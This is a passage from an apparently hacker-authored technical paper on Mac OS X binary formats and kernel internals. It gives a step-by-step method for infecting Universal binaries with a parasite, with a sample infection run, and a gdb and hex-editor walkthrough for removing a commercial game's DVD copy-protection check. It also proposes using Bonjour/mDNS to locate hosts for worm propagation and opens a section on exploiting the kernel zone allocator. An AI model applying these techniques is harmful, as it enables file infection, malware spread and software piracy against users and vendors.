Either FAT_MAGIC or FAT_CIGAM is used depending on the endianness of
the file/system.
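
As a rough illustration of how a parser can cope with both magic values,
the sketch below reads the two header fields in host byte order and
swaps nfat_arch when the byte-swapped magic is seen. swap32() and
read_fat_header() are names invented for this example, and the function
is a minimal sketch rather than the code used by any Apple tool.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define FAT_MAGIC 0xcafebabeU
#define FAT_CIGAM 0xbebafecaU

/* Reverse the byte order of a 32-bit value. */
uint32_t swap32(uint32_t v)
{
        return (v >> 24) | ((v >> 8) & 0x0000ff00U) |
               ((v << 8) & 0x00ff0000U) | (v << 24);
}

/*
 * Returns 0 and stores the architecture count in *nfat_arch when buf
 * starts with a fat header, or -1 otherwise.
 */
int read_fat_header(const uint8_t *buf, size_t len, uint32_t *nfat_arch)
{
        uint32_t magic, n;

        assert(buf != NULL && nfat_arch != NULL);
        if (len < 8)
                return -1;
        memcpy(&magic, buf, 4);
        memcpy(&n, buf + 4, 4);
        if (magic == FAT_MAGIC)
                *nfat_arch = n;                 /* same byte order as host */
        else if (magic == FAT_CIGAM)
                *nfat_arch = swap32(n);         /* opposite byte order */
        else
                return -1;
        return 0;
}
```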


The nfat_arch field of this structure contains the number of 
Mach-O files of which the archive is comprised. On a side note 
if you set this high enough to wrap, just about every debugging 
tool on Mac OS X will crash, as demonstrated below: 


-[nemo@fry:~]$ printf "\xca\xfe\xba\xbe\x66\x66\x66\x66" > file
-[nemo@fry:~]$ otool -tv file
Segmentation fault


For each of the Mach-O files in the Universal binary there 
is also a fat_arch structure. 


This structure is shown below: 


struct fat_arch {
        cpu_type_t cputype;             /* cpu specifier (int) */
        cpu_subtype_t cpusubtype;       /* machine specifier (int) */
        uint32_t offset;                /* file offset to this object file */
        uint32_t size;                  /* size of this object file */
        uint32_t align;                 /* alignment as a power of 2 */
};


The fat_arch structure defines the architecture type of the
Mach-O file, as well as the offset into the Universal binary
in which it is stored. It also contains the alignment of the
architecture for the particular file, expressed as a power
of 2.

The diagram below describes the layout of a typical Universal
binary:

[YOU SWITCH CAPITALIZATION OF UNIVERSAL QUITE OFTEN IN THIS SECTION]

 _______________________
| 0xcafebabe            |
|   struct fat_header   |
|-----------------------|
|  fat_arch struct #1   |---------+
|-----------------------|         |
|  fat_arch struct #2   |------+  |
|-----------------------|      |  |
|  fat_arch struct #n   |---+  |  |
|-----------------------|<--------+
| 0xfeedface            |   |  |
|    Mach-O File #1     |   |  |
|-----------------------|<-----+
| 0xfeedface            |   |
|    Mach-O File #2     |   |
|-----------------------|<--+
| 0xfeedface            |
|    Mach-O file #n     |
|_______________________|


Here you can see the file beginning with a fat_header
structure. Following this are n * fat_arch structures
each defining the offset into the file to find the
particular Mach-O file described by the structure.
Finally n * Mach-O files are appended to the structs.
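
To make the layout concrete, the following sketch walks the fat_arch
table in a buffer and returns the file offset of the slice for a given
cputype. It assumes the header fields are stored big-endian on disk and
uses the field sizes from the structures shown earlier. be32() and
find_slice_offset() are hypothetical helper names. The bounds check on
nfat_arch is deliberate, given how badly tools behave when that field is
oversized.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define FAT_HEADER_SIZE 8       /* magic + nfat_arch */
#define FAT_ARCH_SIZE   20      /* five 32-bit fields */

/* Decode a big-endian 32-bit field. */
uint32_t be32(const uint8_t *p)
{
        return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
               ((uint32_t)p[2] << 8) | (uint32_t)p[3];
}

/*
 * Return the file offset of the Mach-O slice whose cputype matches, or
 * 0 if there is none or the table does not fit in the buffer.
 */
uint32_t find_slice_offset(const uint8_t *buf, size_t len, uint32_t cputype)
{
        uint32_t i, n;

        assert(buf != NULL);
        if (len < FAT_HEADER_SIZE)
                return 0;
        n = be32(buf + 4);
        /* Reject an nfat_arch that cannot fit in the buffer. */
        if (n > (len - FAT_HEADER_SIZE) / FAT_ARCH_SIZE)
                return 0;
        for (i = 0; i < n; i++) {
                const uint8_t *a = buf + FAT_HEADER_SIZE +
                                   (size_t)i * FAT_ARCH_SIZE;

                if (be32(a) == cputype)
                        return be32(a + 8);     /* the offset field */
        }
        return 0;
}
```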


Before I run through the method for infecting Universal 
binaries I will first show how the kernel loads them. 


The file: xnu/bsd/kern/kern_exec.c contains the code 
shown in this section. 


First the kernel sets up a NULL terminated array of
execsw structs. Each of these structures contains a
function pointer to an image activator / parser for
the different image types, as well as a relevant string
description.


The definition and declaration of this array is shown 
below: 


/*
 * Our image activator table; this is the table of the image types we are
 * capable of loading. We list them in order of preference to ensure the
 * fastest image load speed.
 *
 * XXX hardcoded, for now; should use linker sets
 */
struct execsw {
        int (*ex_imgact)(struct image_params *);
        const char *ex_name;
} execsw[] = {
        { exec_mach_imgact, "Mach-o Binary" },
        { exec_fat_imgact, "Fat Binary" },
#ifdef IMGPF_POWERPC
        { exec_powerpc32_imgact, "PowerPC binary" },
#endif /* IMGPF_POWERPC */
        { exec_shell_imgact, "Interpreter Script" },
        { NULL, NULL}
};


The following code from the execve() system call loops 
through each of the elements in this array and calls 
the function pointer for each one. A pointer to the 
start of the image is passed to it. 


int
execve(struct proc *p, struct execve_args *uap, register_t *retval)
{
        for(i = 0; error == -1 && execsw[i].ex_imgact != NULL; i++)
                error = (*execsw[i].ex_imgact)(imgp);


Each of the functions parses the file to determine
if the file is of the appropriate architecture type.
The function which is responsible for matching and
parsing Universal binaries is the "exec_fat_imgact"
function.
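
The dispatch pattern is easy to try out in userland with mock
activators. Everything below is hypothetical and only mirrors the shape
of the kernel loop: struct mock_image stands in for struct image_params,
the two activators merely look at the first bytes of the buffer, and
claim_image() is an invented name.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical stand-in for struct image_params: just the file bytes. */
struct mock_image {
        const unsigned char *data;
        size_t len;
};

/* Each activator returns 0 if it claims the image, -1 otherwise. */
int mock_macho_imgact(struct mock_image *img)
{
        /* Magic as it is stored in a big-endian Mach-O file. */
        static const unsigned char magic[4] = {0xfe, 0xed, 0xfa, 0xce};

        return (img->len >= 4 && memcmp(img->data, magic, 4) == 0) ? 0 : -1;
}

int mock_shell_imgact(struct mock_image *img)
{
        return (img->len >= 2 && img->data[0] == '#' &&
                img->data[1] == '!') ? 0 : -1;
}

struct mock_execsw {
        int (*ex_imgact)(struct mock_image *);
        const char *ex_name;
} mock_execsw[] = {
        { mock_macho_imgact, "Mach-o Binary" },
        { mock_shell_imgact, "Interpreter Script" },
        { NULL, NULL }
};

/* Same loop shape as execve(): stop at the first result that is not -1. */
const char *claim_image(struct mock_image *img)
{
        int i, error = -1;

        assert(img != NULL && img->data != NULL);
        for (i = 0; error == -1 && mock_execsw[i].ex_imgact != NULL; i++)
                error = (*mock_execsw[i].ex_imgact)(img);
        return error == -1 ? NULL : mock_execsw[i - 1].ex_name;
}
```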


The declaration of this function is below:

/*
 * exec_fat_imgact
 *
 * Image activator for fat 1.0 binaries. If the binary is fat, then we
 * need to select an image from it internally, and make that the image
 * we are going to attempt to execute. At present, this consists of
 * reloading the first page for the image with a first page from the
 * offset location indicated by the fat header.
 *
 * Important: This image activator is byte order neutral.
 *
 * Note: If we find an encapsulated binary, we make no assertions
 *       about its validity; instead, we leave that up to a rescan
 *       for an activator to claim it, and, if it is claimed by one,
 *       that activator is responsible for determining validity.
 */
static int
exec_fat_imgact(struct image_params *imgp)

The first thing this function does is test the
magic number at the top of the file. The following
code does this.

/* Make sure it’s a fat binary */
if ((fat_header->magic != FAT_MAGIC) &&
    (fat_header->magic != FAT_CIGAM)) {
        error = -1;
        goto bad;
}

The fatfile_getarch_affinity() function is then
called to search the universal binary for a
Mach-O file with the appropriate architecture
type for the system.

/* Look up our preferred architecture in the fat file. */
lret = fatfile_getarch_affinity(imgp->ip_vp,
                                (vm_offset_t)fat_header,
                                &fat_arch,
                                (p->p_flag & P_AFFINITY));


This function is defined in the file: 
xnu/bsd/kern/mach_fat.c. 


load_return_t
fatfile_getarch_affinity(
        struct vnode *vp,
        vm_offset_t data_ptr,
        struct fat_arch *archret,
        int affinity)


This function searches each of the Mach-O files within the 
Universal binary. A host has a primary and secondary architecture. 
If during this search, a Mach-O file is found which matches
the primary architecture type for the host, this file is
used. If, however, the primary architecture type is not
found, yet the secondary type is found, this will be used.
This is useful when infecting this format.
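

The primary/secondary search can be sketched in user space as
follows. This is only an illustration of the lookup order, not
the XNU code: pick_arch() and be32() are hypothetical helpers,
and the layout assumed is the on-disk one (a big-endian
fat_header of two 32-bit words followed by fat_arch entries of
five 32-bit words each).

```c
#include <stddef.h>
#include <stdint.h>

#define FAT_MAGIC_BE 0xcafebabeu   /* fat_header.magic as stored on disk */

/* Read a 32-bit big-endian value; the fat header is big-endian on disk. */
static uint32_t be32(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}

/*
 * Hypothetical helper (not the XNU function): look for `primary` among
 * the fat_arch entries, falling back to `secondary`.
 * Returns 0 if the primary type matched, 1 if the secondary matched,
 * -1 if the buffer is not a usable fat file or neither type is present.
 */
static int pick_arch(const uint8_t *buf, size_t len,
                     uint32_t primary, uint32_t secondary,
                     uint32_t *offset, uint32_t *size)
{
    if (len < 8 || be32(buf) != FAT_MAGIC_BE)
        return -1;

    uint32_t narch = be32(buf + 4);
    if (narch > (len - 8) / 20)        /* each fat_arch is 20 bytes */
        return -1;

    const uint8_t *fallback = NULL;
    for (uint32_t i = 0; i < narch; i++) {
        const uint8_t *arch = buf + 8 + (size_t)i * 20;
        uint32_t cputype = be32(arch); /* fat_arch.cputype */
        if (cputype == primary) {
            *offset = be32(arch + 8);  /* fat_arch.offset */
            *size   = be32(arch + 12); /* fat_arch.size */
            return 0;
        }
        if (cputype == secondary && fallback == NULL)
            fallback = arch;
    }
    if (fallback == NULL)
        return -1;
    *offset = be32(fallback + 8);
    *size   = be32(fallback + 12);
    return 1;
}
```

With the cputype values from <mach/machine.h> (7 for i386, 18
for PowerPC), a return value of 1 corresponds to the fallback
case described above.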


Once an appropriate Mach-O file has been located the imgp 
ip_arch_offset and ip_arch_size attributes are updated to 
reflect the new position in the file. 


/* Success. Indicate we have identified an encapsulated binary */ 
error = -2; 

imgp->ip_arch_offset = (user_size_t) fat_arch.offset; 
imgp->ip_arch_size = (user_size_t) fat_arch.size; 


After this, exec_fat_imgact() simply returns and lets
execve() continue walking the execsw[] struct array to find
an appropriate loader for the new file.
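

A toy model of that control flow is sketched below. It is not
kernel code: the toy_* names, the two-entry table and its order
are assumptions made for illustration. The only behaviour taken
from the text is that -1 means "not my format" and -2 means "an
encapsulated binary was identified, scan again".

```c
#include <stddef.h>

/* Toy image: just enough state to show the control flow. */
struct toy_image {
    int is_fat;   /* 1 while the image still looks like a Universal binary */
    int loaded;   /* set once a loader has claimed the image */
    int calls;    /* how many activators were consulted */
};

/* Stand-in for the Mach-O activator: refuses anything still "fat". */
static int toy_macho_imgact(struct toy_image *im)
{
    im->calls++;
    if (im->is_fat)
        return -1;
    im->loaded = 1;
    return 0;
}

/* Stand-in for exec_fat_imgact(): selects a slice and asks for a rescan. */
static int toy_fat_imgact(struct toy_image *im)
{
    im->calls++;
    if (!im->is_fat)
        return -1;
    im->is_fat = 0;   /* stands in for updating ip_arch_offset/ip_arch_size */
    return -2;
}

/* Walk the activator table, restarting whenever -2 is returned. */
static int toy_activate(struct toy_image *im)
{
    int (*const sw[])(struct toy_image *) = {
        toy_macho_imgact, toy_fat_imgact
    };
    const int n = (int)(sizeof sw / sizeof sw[0]);

    for (int i = 0; i < n; i++) {
        int error = sw[i](im);
        if (error == 0)
            return 0;     /* an activator claimed the image */
        if (error == -2)
            i = -1;       /* encapsulated binary: restart the scan */
    }
    return -1;            /* nobody claimed it */
}
```

For a fat image the model consults three activators: the Mach-O
one (rejects), the fat one (selects a slice), then the Mach-O
one again, which now treats the selected slice as a fresh binary.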


This logic means that it does not really matter if the
true architecture type of the file matches up with the
architecture specified in the fat_header struct within
the Universal binary. Once a Mach-O file is chosen it will
be treated as a fresh binary.


The method which I propose to infect Universal binaries 
utilizes this behavior. A breakdown of this method is 
as follows: 


1) Determine the primary and secondary architecture types 
for the host machine. 

2) Parse the fat_header struct of the host binary. 

3) Walk through the fat_arch structs and locate the 
struct for the secondary architecture type. 

4) Check that the size of the parasite is smaller than the 
secondary architecture Mach-O file in the Universal binary. 

5) Copy the parasite binary directly over the secondary arch 
binary inside the universal binary. 

6) Locate the primary architecture’s fat_arch structure. 

7) Modify the architecture type field in this structure to be
0xdeadbeef.


Now when the binary is executed, the primary architecture
is not found. Due to this, the secondary architecture is
used. The imgp is set to point to the offset in the file
containing our parasite, and this is executed as expected.

The parasite then opens its own binary (which is quite
possible on Mac OS X) and performs a linear search for
0xdeadbeef. It then modifies this value, changing it back
to the primary architecture type and execve()’s its own file.


Some sample code has been provided with this paper that
demonstrates this method on Intel architecture. The code
unipara.c will copy an Intel architecture Mach-O file
over the PowerPC Mach-O file inside a Universal binary.
After infection has occurred the size of the host file
remains unchanged.


-[nemo@fry:~/code/unipara]$ ./unipara host parasite
-[nemo@fry:~/code/unipara]$ ./host
uid=501(nemo) gid=501(nemo)
-[nemo@fry:~/code/unipara]$ wc -c host
   43028 host
-[nemo@fry:~/code/unipara]$ ./unipara parasite host
 [+] Initiating infection process.
 [+] Found: 2 arch structs.
 [+] We are good to go, attaching parasite.
 [+] parasite implanted at offset: 0x6000
 [+] Switching arch types to execute our parasite.
-[nemo@fry:~/code/unipara]$ wc -c host
   43028 host
-[nemo@fry:~/code/unipara]$ ./host
Hello, World!
uid=501(nemo) gid=501(nemo)


If residency is required after the payload has already been
executed, the parasite can simply fork() before modifying
its binary. The parent process can then execve() while the child
waits and then returns the architecture type to 0xdeadbeef.


--[ 8 - Cracking Example - Prey 


Recently, during an extra long stopover in LAX airport (the most 
boring airport in the entire world) I decided I would pass the 
time by playing the game "Prey" which I had installed onto my 
laptop. 


To my horror, when I tried to start up my game, I was greeted 
with the following error message: 


"Please insert the disc "Prey" or press Quit." 

"Veuillez inserer le disque "Prey" ou appuyer sur Quitter." 
"Bitte legen Sie "Prey" ins Laufwerk ein oder klicken Sie 
auf Beenden." 


Since I had nothing better to do, I decided to spend some 
time removing this error message. First things first I 
determined the object format of the executable file. 


-[nemo@fry:/Applications/Prey/Prey.app/Contents/MacOS]$ file Prey
Prey: Mach-O universal binary with 2 architectures
Prey (for architecture ppc):    Mach-O executable ppc
Prey (for architecture i386):   Mach-O executable i386


The Prey executable is a Universal binary containing a 
PowerPC and an i386 Mach-O binary. 


Next I ran the otool -o command to determine if the code 
was written in Objective-C. The output from this command 
shows that an Objective-C segment is present in the file. 


-[nemo@largeprompt]$ otool -o Prey | head -n 5
Prey:
Objective-C segment
Module 0x27ef458
    version 6
       size 16


I then used the "class-dump" command [14] to dump the
class definitions from the file. Probably the most
interesting of which is shown below:


@interface DOOMController (Private)
- (void)quakeMain;
- (BOOL)checkRegCodes;
- (BOOL)checkOS;
- (BOOL)checkDVD;
@end


Most games on Mac OS X are 10 years behind their Windows 
counterparts when it comes to copy protection. Typically 
the developers don’t even strip the file and symbols are 
still present. Because of this fact, I fired up gdb and 
put a breakpoint on the main function. 


(gdb) break main 
Breakpoint 1 at 0x96b64 


However when I executed the file the error message was
displayed prior to my breakpoint in main being reached.
This led me to the conclusion that a constructor
function was responsible for the check.


To validate this theory I ran the command "otool -l" on
the binary to list the load commands present in the file.
(The Mach-O Runtime Document [4] explains the load_command
struct clearly).


Each section in the Mach-O file has a "flags" value 
associated with it. This describes the purpose of the 
section. Possible values for this flags variable are 
found in the file: /usr/include/mach-o/loader.h. 


The value which represents a constructor section is 
defined as follows: 


/* section with only function pointers for initialization*/
#define S_MOD_INIT_FUNC_POINTERS 0x9


Looking through the "otool -l" output there is only one
section which has the flags value: 0x9. This section is
shown below:


Section
  sectname __mod_init_func
   segname __DATA
      addr 0x00515cec
      size 0x00000380
    offset 5328108
     align 2^2 (4)
    reloff 0
    nreloc 0
     flags 0x00000009
 reserved1 0
 reserved2 0
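

As a small illustration of how these fields are read, the sketch
below tests a flags value for the constructor section type and
works out how many pointers a section of a given size holds. The
two constants are the ones from <mach-o/loader.h>, repeated here
so the fragment builds anywhere; the helper names are made up
for this example.

```c
#include <stdint.h>

/* Values as defined in <mach-o/loader.h>. */
#define SECTION_TYPE              0x000000ffu
#define S_MOD_INIT_FUNC_POINTERS  0x9u

/* Non-zero if a section's flags mark it as a table of initializer pointers. */
static int is_init_section(uint32_t flags)
{
    return (flags & SECTION_TYPE) == S_MOD_INIT_FUNC_POINTERS;
}

/* Number of pointers held in a section of `size` bytes (hypothetical helper). */
static uint32_t init_pointer_count(uint32_t size, uint32_t pointer_size)
{
    return pointer_size ? size / pointer_size : 0;
}
```

For the section shown above (flags 0x00000009, size 0x380 and
4 byte pointers on i386) this gives 224 entries.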


Now that the virtual address of the constructor section 
for this application was known, I simply fired up gdb 
again and put breakpoints on each of the pointers 
contained in this section. 


(gdb) x/x 0x00515cec
0x515cec <_ZTI14idSIMD_Generic+12>:     0x028cc8db
(gdb)
0x515cf0 <_ZTI14idSIMD_Generic+16>:     0x00495852
(gdb)
0x515cf4 <_ZTI14idSIMD_Generic+20>:     0x0049587c
(gdb) break *0x028cc8db
Breakpoint 1 at 0x28cc8db
(gdb) break *0x00495852
Breakpoint 2 at 0x495852
(gdb) break *0x0049587c
Breakpoint 3 at 0x49587c


I then executed the program. As expected the first break point 
was hit before the error message box was displayed. 


(gdb) r 
Starting program: /Applications/Prey/Prey.app/Contents/MacOS/Prey 


Breakpoint 1, 0x028cc8db in dyld_stub_log10f ()
(gdb) continue


I then continued execution and the error message appeared. This
happened before the second breakpoint was reached. This indicated
that the first pointer in the __mod_init_func section was
responsible for the DVD checking process.


In order to validate my theory I restarted the process. This time 
I deleted all breakpoints except the first one. 


(gdb) delete
Delete all breakpoints? (y or n) y
(gdb) break *0x028cc8db
Breakpoint 4 at 0x28cc8db
(gdb) r
Starting program: /Applications/Prey/Prey.app/Contents/MacOS/Prey
Reading symbols for shared libraries . done


Once the breakpoint is reached, I simply "return" from the
constructor, without testing for the DVD.


Breakpoint 4, 0x028cc8db in dyld_stub_log10f ()
(gdb) ret
Make selected stack frame return now? (y or n) y
#0 0x8fe0fcc4 in __dyld__ZN16ImageLoaderMachO16doInitialization... ()


And then continue execution.


(gdb) c


The error message was gone and Prey started up as if the DVD
was in the drive, SUCCESS! After playing the game for about 10
minutes and running through the same boring corridor over and
over again I decided it was more fun to continue cracking the
game than to actually play it. I exited the game and returned
to my shell.


In order to modify the binary I used the HT Editor. [15]
Before I could use HTE to modify this file however, I had to
extract the appropriate architecture for my system from the
Universal binary. I accomplished this using the ditto command
as follows.


-[nemo@fry:/Prey/Prey.app/Contents/MacOS]$ ditto -arch i386 Prey Prey.i386
-[nemo@fry:/Prey/Prey.app/Contents/MacOS]$ cp Prey Prey.backup
-[nemo@fry:/Applications/Prey/Prey.app/Contents/MacOS]$ cp Prey.i386 Prey


I then loaded the file in HTE. I pressed F6 to select the mode
and chose the Mach-O/header option. I then scrolled down to
find the __mod_init_func section. This is shown as follows:


**** section 3 ****
section name                  __mod_init_func
segment name                  __DATA
virtual address               00515cec
virtual size                  00000380
file offset                   00514cec
alignment                     00000002
relocation file offset        00000000
number of relocation entries  00000000
flags                         00000009
reserved1                     00000000
reserved2                     00000000

In order to skip the first constructor I simply added four
bytes to the virtual address field, and subtracted four
bytes from the size. I did this by pressing F4 in HTE and
typing the values. Here are the new values:


**** section 3 ****
section name                  __mod_init_func
segment name                  __DATA
virtual address               00515cf0  <== += 4
virtual size                  0000037c  <== -= 4
file offset                   00514cec
alignment                     00000002
relocation file offset        00000000
number of relocation entries  00000000
flags                         00000009
reserved1                     00000000
reserved2                     00000000


I then saved this new binary and executed it, again Prey
started up fine without mentioning the missing DVD.


Finally I repeated this process for the PowerPC binary 
and packed the two back together into a Universal binary 
using the lipo command. 


--[ 9 - Passive malware propagation with mDNS 


As I’m sure all of you are aware, the only reason for the
lack of malware on Mac OS X is due to the lack of market
share (And therefore lack of people caring).


In this section I propose a way to remedy this. This method
utilizes one of the default services which ships on Mac OS X
10.4 at the time of writing: mDNSResponder.


The mDNSResponder service is an implementation of the
multicast DNS protocol. This protocol is documented
thoroughly by several of the documents linked from [17].
Also if you’re interested in the protocol it makes sense
to read the RFC [18].


At a packet level the multicast DNS protocol is very similar
to regular DNS. It also serves a similar (yet different)
purpose: mDNS is used to create a way for hosts on a LAN
to automagically configure their network settings and begin
communication without a DHCP server on the network. It is
also designed to allow the services on a network to be
browsable.


Recently, mDNS implementations have been shipping for a large
variety of operating systems, including Mac OS X, Vista, Linux
and a variety of hardware devices such as printers. The mDNS
implementation which is packaged with Mac OS X is called
Bonjour.


Bonjour contains a useful API for registering and browsing
services advertised by mDNS. The daemon mDNSResponder is
responsible for all the network communication via a mach port
named "com.apple.mDNSResponder" that is made available to the
system for communication with the daemon. The documentation
for the API which is used to manipulate this daemon is found
at [19].


The command line tool /usr/bin/mdns also exists for manipulating
the mDNSResponder daemon directly [20]. This tool has the following
functionality:


-[nemo@fry:~]$ mdns
mdns -E     (Enumerate recommended registration domains)
mdns -F     (Enumerate recommended browsing domains)
mdns -B <Type> <Domain>     (Browse for services instances)
mdns -L <Name> <Type> <Domain>     (Look up a service instance)
mdns -R <Name> <Type> <Domain> <Port> [<TXT>...] (Register a service)
mdns -A     (Test Adding/Updating/Deleting a record)
mdns -U     (Test updating a TXT record)
mdns -N     (Test adding a large NULL record)
mdns -T     (Test creating a large TXT record)
mdns -M     (Test creating a registration with multiple TXT records)
mdns -I     (Test registering and then immediately updating TXT record)


Here is an example demonstrating using this tool to look for SSH
instances:


-[nemo@fry:~]$ mdns -B _ssh._tcp.
Browsing for _ssh._tcp.local
Talking to DNS SD Daemon at Mach port 3843
Timestamp     A/R Flags Domain   Service Type   Instance Name
11:16:45.816  Add     1 local.   _ssh._tcp.     fry


As you can see, this functionality would be very useful for 
malware installed on a new host. 


Once a worm has compromised a new host, it must then scan for
new targets to attack. This scanning is one of the most common
ways for a worm to be detected on a network. In the case of
Mac OS X, where a large amount of scanning would be required to
find a single target, this will more likely be the case.


We can use the Bonjour API to wait silently for a service to
advertise itself to our code, then infect the target as
necessary. This will greatly reduce the network traffic
required for worm propagation.


The header file which contains the definition for the structs
and functions needed is /usr/include/dns_sd.h. The functions
needed are contained within libSystem and are therefore linked with
almost every binary on the system. This is good news if you have
just infected a new process and wish to perform the mDNS lookup
from inside its address space.


The Bonjour API allows us to register a service, enumerate
domains as well as many other useful things. I will only
focus on browsing for an instance of a particular type of
service in this paper, however. This is a relatively
straightforward process.


The first function needed to find an instance of a service is the 
DNSServiceBrowse() function (shown below). 


DNSServiceErrorType DNSServiceBrowse (
        DNSServiceRef           *sdRef,
        DNSServiceFlags         flags,
        uint32_t                interfaceIndex,
        const char              *regtype,
        const char              *domain,    /* may be NULL */
        DNSServiceBrowseReply   callBack,
        void                    *context    /* may be NULL */
);


The arguments to this are fairly straightforward. We simply
pass an uninitialized DNSServiceRef pointer, followed by an
unused flags argument. The interfaceIndex specifies the
interface on which to perform the query. Setting this to 0
results in the query being broadcast on all interfaces. The
regtype field is used to specify the type of service we wish
to browse for. In our example we will search for ssh. So the
string "_ssh._tcp" is used to specify ssh over tcp. Next the
domain argument is used to specify the logical domain we wish
to browse. If this argument is NULL, the default domains are
used. Finally a callback must be supplied in order to indicate
what to do once an instance is found. This function can include
our infection/propagation code.


Once the call to DNSServiceBrowse() has been made, the function 
DNSServiceProcessResult() must be used to begin processing. 


This function simply takes the sdRef, initialized from the 
first call to DNSServiceBrowse(), and calls the callback 
function when results are received. It will block until 
finding an instance. 


Once a service is found, it must be resolved to an IP address 
and port so it can be infected. 


To do this the DNSServiceResolve() function can be used.
This function is very similar to the DNSServiceBrowse()
function, however a DNSServiceResolveReply() callback
is used. Also the name of the service must already be
known. The function prototype is as follows:


DNSServiceErrorType DNSServiceResolve (
        DNSServiceRef           *sdRef,
        DNSServiceFlags         flags,
        uint32_t                interfaceIndex,
        const char              *name,
        const char              *regtype,
        const char              *domain,
        DNSServiceResolveReply  callBack,
        void                    *context    /* may be NULL */
);


The callback for this function receives the following 
arguments: 


/* a callback matching the DNSServiceResolveReply typedef */
void resolve_target (
        DNSServiceRef           sdRef,
        DNSServiceFlags         flags,
        uint32_t                interfaceIndex,
        DNSServiceErrorType     errorCode,
        const char              *fullname,
        const char              *hosttarget,
        uint16_t                port,
        uint16_t                txtLen,
        const char              *txtRecord,
        void                    *context
);


Once again we must call the DNSServiceProcessResult()
function, passing the sdRef received from DNSServiceResolve(),
to begin processing.


Once within the callback, the port which the service runs
on is passed in as a short in network byte order.


Retrieving the IP address is simply a case of calling 
gethostbyname() on the hosttarget argument. 
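

As a minimal sketch of the byte order point, the helper below
(format_target() is a made-up name, not part of dns_sd.h) turns
the hosttarget and port values a resolve callback receives into
a printable "host:port" string. It assumes only the POSIX
ntohs() call and leaves name resolution out.

```c
#include <arpa/inet.h>
#include <stdint.h>
#include <stdio.h>

/*
 * Hypothetical helper: render "host:port" from the values a resolve
 * callback receives. `port_net` is in network byte order, so it must be
 * converted with ntohs() before being printed or compared.
 */
static int format_target(char *out, size_t outlen,
                         const char *hosttarget, uint16_t port_net)
{
    return snprintf(out, outlen, "%s:%u", hosttarget,
                    (unsigned)ntohs(port_net));
}
```

Printing the port without the ntohs() conversion would show a
byte-swapped value on little-endian machines such as the Intel
Macs.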


I have included some code in the Appendix (discover.c)
which demonstrates this clearly. This code can sit in a
loop to enumerate each of the services and infect them.


Opensshd warez not included. ;-) 


--[ 10 - Kernel Zone Allocator exploitation


A zone allocator is a memory allocator which is designed 
for efficient allocation of objects of identical size. 


In this section I will look at how the mach zone allocator, 
(the zone allocator used by the XNU kernel) works. Then I 
will look at how an overflow into the pages used by the zone 
allocator can be exploited. 


The source for the mach zone allocator is located in the file 
xnu/osfmk/kern/zalloc.c. 


Some of the objects in the XNU kernel which use the mach zone
allocator for allocation are: the task structs, the thread
structs, the pipe structs and the zone structs themselves.


A list of the current zones on the system can be retrieved
from userspace using the host_zone_info() function. Mac OS X
ships with a tool which takes advantage of this:


/usr/bin/zprint


This tool displays each of the zones and their element size,
current size, max size etc. Here is some sample output from
running this program.


                        elem    cur    max    cur    max    cur  alloc  alloc
zone name               size   size   size  #elts  #elts  inuse   size  count
zones                     80    11K    12K    152    153     95     4K     51
vm.objects               136  3609K  3888K  27180  29274  21116     4K     30 C
vm.object.hash.entries    20   374K   512K  19176  26214  17674     4K    204 C
tasks                    432    59K   432K    141   1024    113    20K     47 C
threads                  868   329K  2172K    389   2562    295    56K     66 C
uthreads                 296   114K   740K    396   2560    296    16K     55 C
alarms                    44     3K     4K     93     93      2     4K     93 C
load_file_server          36    56K   492K   1605  13994   1605     4K    113
mbuf                     256     0K  1024K      0   4096      0     4K     16 C
socket                   344    38K  1024K    114   3048      ?    20K     59 C


It also gives you a chance to see some of the different types
of objects which utilize the zone allocator.
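

The columns in this output are related by simple integer
division. The sketch below is an observation drawn from the
sample numbers rather than from the zprint source, and the
helper names are invented for the example: the "alloc count"
column matches alloc size divided by elem size, and "max #elts"
matches max size divided by elem size.

```c
#include <stdint.h>

/* Elements obtained each time the zone grows by one allocation. */
static uint32_t elems_per_alloc(uint32_t alloc_size, uint32_t elem_size)
{
    return elem_size ? alloc_size / elem_size : 0;
}

/* Upper bound on elements for a zone limited to max_size bytes. */
static uint32_t max_elems(uint32_t max_size, uint32_t elem_size)
{
    return elem_size ? max_size / elem_size : 0;
}
```

For the "tasks" zone, 20K / 432 gives 47 elements per
allocation and 432K / 432 gives a maximum of 1024 elements,
matching the row above.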


Before I demonstrate how to exploit an overflow into these 
zones, we will first look at how the zone allocator functions. 


When the kernel wishes to start allocating objects within a zone 
the zinit() function is first called. This function is used to 
allocate the zone which will contain each member of that 
specific object type. The information about the newly created 
zone needs a place to stay. The "struct zone" struct is used to 
accommodate this information. The definition of this struct is 
shown below.


struct zone {
        int             count;          /* Number of elements used now */
        vm_offset_t     free_elements;
        decl_mutex_data(,lock)          /* generic lock */
        vm_size_t       cur_size;       /* current memory utilization */
        vm_size_t       max_size;       /* how large can this zone grow */
        vm_size_t       elem_size;      /* size of an element */
        vm_size_t       alloc_size;     /* size used for more memory */
        unsigned int
        /* boolean_t */ exhaustible :1, /* (F) merely return if empty? */
        /* boolean_t */ collectable :1, /* (F) garbage collect empty pages */
        /* boolean_t */ expandable :1,  /* (T) expand zone (with message)? */
        /* boolean_t */ allows_foreign :1,/* (F) allow non-zalloc space */
        /* boolean_t */ doing_alloc :1, /* is zone expanding now? */
        /* boolean_t */ waiting :1,     /* is thread waiting for expansion? */
        /* boolean_t */ async_pending :1, /* asynchronous allocation pending? */
        /* boolean_t */ doing_gc :1;    /* garbage collect in progress? */
        struct zone *   next_zone;      /* Link for all-zones list */
        call_entry_data_t call_async_alloc; /* callout for asynchronous alloc */
        const char      *zone_name;     /* a name for the zone */
#if     ZONE_DEBUG
        queue_head_t    active_zones;   /* active elements */
#endif  /* ZONE_DEBUG */
};


The first thing that the zinit() function does is check if there is
an existing zone in which to store the new zone struct. The
global pointer "zone_zone" is used for this. If the mach zone
allocator has not yet been used, the zget_space() function is
used to allocate more space for the zones zone (zone_zone).


The code which performs this check is as follows:


if (zone_zone == ZONE_NULL) {
        if (zget_space(sizeof(struct zone), (vm_offset_t *)&z)
            != KERN_SUCCESS)
                return(ZONE_NULL);
} else
        z = (zone_t) zalloc(zone_zone);


If the zone_zone exists, the zalloc() function is used to
retrieve an element from the zone. Each of the attributes
of this new zone is then populated.


z->free_elements = 0;
z->cur_size = 0;
